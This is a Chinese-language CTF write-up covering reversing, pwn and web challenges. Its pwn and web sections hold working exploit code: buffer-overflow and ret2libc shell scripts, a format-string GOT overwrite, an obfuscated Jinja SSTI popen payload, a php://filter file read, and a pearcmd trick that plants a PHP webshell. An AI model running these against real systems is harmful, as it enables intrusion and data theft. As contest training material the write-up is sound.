ez_logic Ida反编译后发现由许多setjmp和longjmp组成,发现算法为相邻两个一组做区间加法,并且区间有序,差分后从前到后匹配即可
RE_签到 ida反编译一下
找到flag
ez_base ida反编译后,仔细阅读发现就是一张 的地图上有一些可以走的点,要求每个点只走一次且按“马”的方式走从 到 ,BFS即可
ez_vm ida反编译后,已知一个操作列表,逐步完成操作
经分析:
Case 0:把栈顶两个数相加
Case 1:把栈顶两个数相减
Case 2:把栈顶两个数相异或
Case 3:把栈顶两个数相比较
Case 4,5,6:为比较后的跳转
Case 7:对栈顶的数在另一个数组中下标转值
Case 8:改写数组
Case 9:向栈里加一个数
Case 10:Wrong
Case 11:Right
Case 12:跳转
令另一个数组为Str[]
发现一些结构如
1 2 3 4 5 6 7 8 9 10 9 A 9 100 8 9 100 7 9 lim 3 5 loop1 ... 9 1 9 100 7 0 9 100 8 C loop2 是一个循环 for(i=A;i<lim;i++) { ... }
发现流程由三个循环和一些赋值组成,且代码由Str[100]作为循环的i
分析一下三个循环中分别为
1 2 3 for(int i=0;i<25;i++) Str[i]=Str[i]^Str[i+1] for(int i=0;i<24;i++) Str[i+1]+=Str[i]-i {for(int i=1;i<25;i++) if(Str[i]!=Str[i+49]) return wrong; return right;}
爆破一下Str[0],倒着做即可
ez_unity 先找到核心代码文件 .\XuhanYilun_Data\Managed\Assembly-CSharp.dll
用ILSpy反编译,在项目中找到GameManager.cs
打开GameManager.cs ,在 Update函数中发现这样一段
把这一段去掉后重新编译成dll替换掉原来的Assembly-CSharp.dll
这样人物就不会死亡了
ez_xxx 一眼SMC
patch掉反调试部分后dump出内存,分析内存数据。
写出exp
1 2 3 4 target = [0x7E ,0x1F ,0x43 ,0x5E ,0x1F ,0x50 ,0x4B ,0x45 ,0x5F ,0x4B ,0x4D ,0x5A ,0x4B ,0x44 ,0x5B ,0x5A ,0x41 ,0x5F ,0x50 ,0x4B ,0x42 ,0x5E ,0x45 ,0x41 ,0x5A ,0x40 ,0x58 ,0x55 ,0x4B ,0x4D ,0x5A ,0x40 ,0x4B ,0x5F ,0x45 ,0x5A ,0x43 ,0x58 ,0x41 ,0x4B ,0x59 ,0x4D ,0x5A ] for i in target: print (chr ((i ^ 0x28 ) - 4 ), end = "" )
ez_dp 使用pyinstxtractor工具分解出pyc
猜测函数主逻辑位于 t4.pyc
,反编译。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 import wx, wx.xrc, randomclass MyDialog1 (wx.Dialog): x = 123 y = 321 tot = 0 zq = 0 flag = 0 def __init__ (self, parent ): wx.Dialog.__init__(self, parent, id =(wx.ID_ANY), title=(wx.EmptyString), pos=(wx.DefaultPosition), size=(wx.Size(400 , 200 )), style=(wx.DEFAULT_DIALOG_STYLE)) self.SetSizeHintsSz(wx.DefaultSize, wx.DefaultSize) bSizer1 = wx.BoxSizer(wx.VERTICAL) self.m_staticText1 = wx.StaticText(self, wx.ID_ANY, '123+321' , wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText1.Wrap(-1 ) self.m_staticText1.SetFont(wx.Font(36 , 70 , 90 , 90 , False , '宋体' )) bSizer1.Add(self.m_staticText1, 0 , wx.ALL, 5 ) self.m_textCtrl1 = wx.TextCtrl(self, wx.ID_ANY, '在此输入您的答案' , wx.DefaultPosition, wx.DefaultSize, wx.TE_PROCESS_ENTER) bSizer1.Add(self.m_textCtrl1, 0 , wx.ALL, 5 ) self.m_button2 = wx.Button(self, wx.ID_ANY, '提交' , wx.DefaultPosition, wx.DefaultSize, 0 ) bSizer1.Add(self.m_button2, 0 , wx.ALL, 5 ) self.m_staticText2 = wx.StaticText(self, wx.ID_ANY, '做出9999999道加法题,而且准确率为100%就给你flag' , wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText2.Wrap(-1 ) bSizer1.Add(self.m_staticText2, 0 , wx.ALL, 5 ) self.SetSizer(bSizer1) self.Layout() self.Centre(wx.BOTH) self.m_textCtrl1.Bind(wx.EVT_TEXT_ENTER, self.tj) self.m_button2.Bind(wx.EVT_BUTTON, self.tj) def __del__ (self ): pass def gogogo (self, x ): if x >= 100 : self.flag += 1 return self.gogogo(x + 1 ) self.gogogo(x + 2 ) def get_flag (self ): self.gogogo(0 ) return self.flag def tj (self, event ): self.tot += 1 ans = self.m_textCtrl1.Value try : if eval (ans) == self.x + self.y: self.zq += 1 self.m_staticText2.Label = '答案正确 正确率:' + str (self.zq) + '/' + str (self.tot) else : self.m_staticText2.Label = '答案错误 正确率:' + str (self.zq) + '/' + str (self.tot) except : self.m_staticText2.Label = '未知错误 正确率:' + str (self.zq) + '/' + str (self.tot) else : if self.zq >= 9999999 : if self.zq == self.tot: a = self.get_flag() self.m_staticText2.Label = 'scuctf{' + str (a) + '}' self.m_textCtrl1.Value = '' self.x = random.choice(range (1000 )) self.y = random.choice(range (1000 )) self.m_staticText1.Label = str (self.x) + '+' + str (self.y) app = wx.App(False ) zjm = MyDialog1(None ) zjm.Show(True ) app.MainLoop()
发现是斐波拉契数列。
ez_android JADI分析.apk,函数主逻辑位于`com/example.check/MainActivity
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 package com.example.check;import android.os.Bundle;import android.view.View;import android.widget.Button;import android.widget.TextView;import androidx.appcompat.app.AppCompatActivity;import com.example.check.databinding.ActivityMainBinding;public class MainActivity extends AppCompatActivity { private ActivityMainBinding binding; private int click_times = 0 ; private String string = new String (); private TextView textView; public native int check_s (String str) ; public native String stringFromJNI () ; static { System.loadLibrary("check" ); } @Override public void onCreate (Bundle bundle) { super .onCreate(bundle); ActivityMainBinding inflate = ActivityMainBinding.inflate(getLayoutInflater()); this .binding = inflate; setContentView(inflate.getRoot()); this .textView = (TextView) findViewById(R.id.textView2); ((Button) findViewById(R.id.button)).setOnClickListener(new View .OnClickListener() { @Override public void onClick (View view) { MainActivity.this .click1(); } }); ((Button) findViewById(R.id.button2)).setOnClickListener(new View .OnClickListener() { @Override public void onClick (View view) { MainActivity.this .click2(); } }); ((Button) findViewById(R.id.button3)).setOnClickListener(new View .OnClickListener() { @Override public void onClick (View view) { MainActivity.this .click3(); } }); ((Button) findViewById(R.id.button4)).setOnClickListener(new View .OnClickListener() { @Override public void onClick (View view) { MainActivity.this .click4(); } }); ((Button) findViewById(R.id.button5)).setOnClickListener(new View .OnClickListener() { @Override public void onClick (View view) { MainActivity.this .click5(); } }); ((Button) findViewById(R.id.button6)).setOnClickListener(new View .OnClickListener() { @Override public void onClick (View view) { MainActivity.this .click6(); } }); ((Button) findViewById(R.id.button7)).setOnClickListener(new View .OnClickListener() { @Override public void onClick (View view) { MainActivity.this .click7(); } }); } private void update () { int i = this .click_times + 1 ; this .click_times = i; if (i >= 1000 ) { this .textView.setText("scuctf{I_do_not_like_Android}" ); } else { this .textView.setText("你已经点击" + String.valueOf(this .click_times) + "次,加油!" ); } } public void click1 () { update(); } public void click2 () { update(); } public void click3 () { update(); this .string += '0' ; } public void click4 () { update(); } public void click5 () { update(); this .string += '1' ; } public void click6 () { update(); } public void click7 () { update(); if (check_s(this .string) == 0 ) { this .textView.setText("nice" ); String str = new String (); String str2 = new String (); for (int hashCode = this .string.hashCode(); hashCode != 0 ; hashCode /= 10 ) { str = str + String.valueOf(hashCode % 10 ); } for (int i = 0 ; i < str.length(); i++) { str2 = str2 + String.valueOf((int ) str.charAt(i)); } this .textView.setText("scuctf{" + str2 + "}" ); } } }
基本逻辑:通过 click3
和 click5
生成一串01串。调用native层函数check_s检验
找到判断函数后为依次解析二进制,返回表中对应,把flag中的字符反射成二进制后拼起来即可
exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 public class android { public static void main (String[] args) { String string = "111110010001111100001001111111101111010111111110110111111101000001001001011100111111101111110111111100011111000111111100001111100100011111000010011111110000111110011100010000010100110000000111111101000110101111111111101111100111100100000010111001111100111111111111001000111110000100111111110111101011111111011011111111101010000001111110111111000101011111110101011111101111100011111111010010000001010011001100011111001111111101101111111000001011011010010100101111111010010100010001111100011111111111110010100110000010100010111001100" ; String str = new String (); String str2 = new String (); for (int hashCode = string.hashCode(); hashCode != 0 ; hashCode /= 10 ) { str = str + String.valueOf(hashCode % 10 ); } System.out.println(string.hashCode()); for (int i = 0 ; i < str.length(); i++) { str2 = str2 + String.valueOf((int ) str.charAt(i)); } System.out.println("scuctf{" + str2 + "}" ); } }
PWN 2048_game 测试2048水平?(雾
test_your_nc nc & cat flag即可。
ret2text 1 2 3 4 5 6 7 from pwn import *elf = ELF("ret2text" ) payload = b"A" * (32 + 4 + 4 ) payload += p32(0x08049256 ) sh = remote("114.117.187.56" , 10002 ) sh.sendline(payload) sh.interactive()
ret2shellcode 1 2 3 4 5 6 7 8 from pwn import *context(arch = "amd64" , os = "linux" ) sh = remote("114.117.187.56" , 10003 ) sh.recv() sh.sendline(asm(shellcraft.sh())) sh.recv() sh.sendline(b"A" * (32 + 8 ) + p64(0x4040A0 )) sh.interactive()
ret2libc 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 from pwn import *from LibcSearcher import *context(log_level = "debug" ) context.terminal = ["konsole" , "-e" ] elf = ELF("ret2libc" ) elf_puts_got = elf.got["puts" ] elf_puts_plt = elf.plt["puts" ] __libc_start_main_got = elf.got["__libc_start_main" ] __libc_start_main_symb = elf.symbols["__libc_start_main" ] main_symb = 0x4010F0 pop_rdi_ret = 0x401333 pop_rsi_pop_r15_ret = 0x401331 ret = 0x40101a sh = remote("114.117.187.56" , "10007" ) payload1 = b"A" * (32 + 8 ) + p64(pop_rdi_ret) payload1 += p64(elf_puts_got) payload1 += p64(elf_puts_plt) payload1 += p64(main_symb) sh.recv() sh.sendline(payload1) leaked_puts_str = sh.recvuntil(b"\nDo" ) sh.recv() puts_real = (u64(leaked_puts_str[1 :-3 ].ljust(8 , b"\x00" ))) print (hex (puts_real))searcher = LibcSearcher("puts" , puts_real) libc_base = puts_real - searcher.dump("puts" ) payload2 = b"A" * (32 + 8 ) + p64(pop_rdi_ret) str_bin_sh = searcher.dump("str_bin_sh" ) + libc_base payload2 += p64(str_bin_sh) system_sh = searcher.dump("system" ) + libc_base payload2 += p64(ret) payload2 += p64(system_sh) sh.sendline(payload2) sh.interactive()
fmt 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 from pwn import *from LibcSearcher import *context(log_level = "debug" , terminal = ["konsole" , "-e" ], arch = "amd64" ) sh = remote("114.117.187.56" , "10004" ) elf = ELF("./fmt" ) libc = ELF("./libc.so.6" ) payload_leak = b"%7$08sBB" payload_leak += p64(elf.got["__libc_start_main" ]) sh.recv() sh.sendline(payload_leak) leaked_libc_start_main = sh.recvuntil(b"BB" ) leaked_libc_start_main = u64(leaked_libc_start_main[2 :-2 ].ljust(8 , b"\x00" )) libc_s = LibcSearcher("__libc_start_main" , leaked_libc_start_main) printf_got = elf.got["printf" ] payload_leak2 = b"%7$08sBB" payload_leak2 += p64(elf.got["puts" ]) sh.recv() sh.sendline(payload_leak2) sh.recv() leaked_puts = sh.recvuntil(b"BB" ) leaked_puts = u64(leaked_puts[2 :-2 ].ljust(8 , b"\x00" )) print (leaked_puts)libc_s.add_condition("puts" , leaked_puts) libc_s.select_libc(0 ) libc_base = leaked_libc_start_main - libc_s.dump("__libc_start_main" ) system_addr = libc_s.dump("system" ) + libc_base printf_addr = libc_s.dump("printf" ) + libc_base print (hex (printf_got))print (hex (system_addr))payload = fmtstr_payload(6 , {printf_got : system_addr}) print (len (payload))sh.sendline(payload) sh.recv() sh.sendline(b"/bin/sh" ) sh.interactive() ''' in 1st case 0x7f47e26a0c90 0x7f47e2691290 other 0x7f97d4037c90 0x7f97d4028290 0x7f70c6c4dc90 0x7f70c6c3e290 ''' sh.recv() ''' 0x70 0x17 0xfd 0x1d 0x7e 0x7f 0x00 0x00 0x00007f7e1dfd1770 70 1 0x404038 <printf@got.plt>: 0x70 0x97 0xb2 0x9b 0xa0 0x7f 0x00 0x00 0x404040 <alarm@got.plt>: 0xa0 0xc1 0xba 0x9b 0xa0 0x7f 0x00 0x00 0x404048 <read@got.plt>: 0x00 0x10 0xbd 0x9b 0xa0 0x7f 0x00 0x00 0x404050 <signal@got.plt>: 0x80 0x28 0xb1 0x9b 0xa0 0x7f 0x00 0x00 0x7fa09bb233d0 0x7fa09bb29770 0x00007fa09bb29770 <printf@got.plt>: 0x70 0x97 0xb2 0x9b 0xa0 0x7f 0x00 0x00 <printf@got.plt>: 0x00007ff660ecd770 0x00007ff660f501a0 '''
Web CheckIn 数组绕过hash函数
1 2 3 4 import requestsurl = "http://114.117.187.56:11000/" r = requests.post(url, params = {"a[]" : 1 }, data = {"b[]" : 2 }) print (r.text)
Include 伪协议读取 flag.php
。
1 2 3 4 5 6 7 import requestsfrom base64 import *url = "http://114.117.187.56:11002/" r = requests.post(url, params = {"file" : r"php://filter/read=convert.base64-encode/resource=flag.php" }) print (b64decode(b"PD9waHANCiRmbGFnID0gJ3NjdWN0Zns2YWZmNWE3N2JhNjg1ODY1MTVhYTViMGE5YTFiZTVhMn0nOw==" ))
easy_flask 首先爆破出Popen在哪个subclasses中
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 import requestspayload1 = '''{% if ((()|attr("__ssalc__"[::-1])|attr("__esab__"[::-1])|attr("__sessalcbus__"[::-1])())[''' payload2 = ''']|attr("__tini__"[::-1])|attr("__slabolg__"[::-1]))["popen"]("sleep 50") == "chiv"%} a {% endif %}''' tmp = 0 for i in range (200 ): prams = {"name" : payload1 + str (i) + payload2} req = requests.get("http://114.117.187.56:11003/view" , params = prams) if (req.text != tmp): tmp = req.text print (i, req.text)
爆破出是第139个。
不能出网,盲注。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 import requestsfrom string import printablepayload = '''{% if ((()|attr("__ssalc__"[::-1])|attr("__esab__"[::-1])|attr("__sessalcbus__"[::-1])())[137]|attr("__tini__"[::-1])|attr("__slabolg__"[::-1]))["popen"]('galf/ tac'[::-1]).read()[''' payload2 = ''']=="''' payload3 = '''"%} a {% endif %}''' for index in range (100 ): flag = 1 for char in printable: param = {"name" : payload + str (index) + payload2 + char + payload3} req = requests.get("http://114.117.187.56:11003/view" , params = param) if req.text == "Ok" : print (char, end = "" ) break elif req.text != "NO" : flag = 0
JSJSJS 1 2 3 4 5 import requestsfrom base64 import *url = "http://114.117.187.56:11005/api/flag" r = requests.post(url) print (r.text)
baby_ip 1 2 3 4 5 import requestsfrom base64 import *url = "http://114.117.187.56:11004/" r = requests.post(url, data={"password" : b64decode(b"aGdneXlkcw==" )}, headers={"X-Forwarded-For" : "127.0.0.1" }) print (r.text)
可爱的探针 1 2 3 4 5 import requestsfrom base64 import *url = "http://117.50.188.49:1145/tz.php" r = requests.post(url, params={"act" : "phpinfo" }) print (r.text)
python tmp_web.py | grep SCUCTF
真ikun进 view http://114.117.187.56:11006/js/game.js?s=4
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 let flag = "c23Rme22QwOTJlLTYyNDQtMTFlZC1hYTFhLWM4NThjMDllYjE0MH0=" ;const regex = /lgg/g ;String .prototype .insetAt = function (str,offset ){ var regx = new RegExp ("(.{" +offset+"})" ); return this .replace (regx,"$1" +str); }; if (regex.test ("lgg" )){ flag = flag.insetAt ('N1Y' ,2 ); } if (regex.test ("lgg" )){ flag = flag.insetAt ("QC2" ,6 ); } if (regex.test ("yuelgg" )){ flag = flag.insetAt ('JiY' ,10 ); } if (regex.test ("yuelgg" )){ flag = flag.insetAt ('C3Y' ,14 ); } let trueflag = flag;
run this code
1 echo c2N1Y3Rme2JiY2QwOTJlLTYyNDQtMTFlZC1hYTFhLWM4NThjMDllYjE0MH0= | base64 -d
简单的CMS 被编码问题坑惨了。。。。
http://114.117.187.56:12000/?+config-create+/&r=../../../../../../../../../../../usr/share/php/pearcmd&/<?=print(1);?>+/tmp/ktou.php
1 2 3 4 5 import requestsfrom base64 import *url = "http://114.117.187.56:12000/" r = requests.post(url, params={"r" : '''../../../../../../../../tmp/ktou''' }, data = {"1" :'''system("cat /flag*");''' }) print (r.text)
unserialize 1 2 3 4 5 import requestsfrom base64 import *url = "http://114.117.187.56:11008/" r = requests.post(url, params={"p" : '''O:1:"A":2:{s:3:"kfc";s:7:"v_me_50";}''' }) print (r.text)
ezbypass 环境崩了。说下思路
http://43.142.108.183:8085/?url=php://filter/read=convert.iconv.UTF-16BE.UTF-32BE/resource=/flag
对这串base64解码,去除所有 \x00
的byte,就可以得到flag了。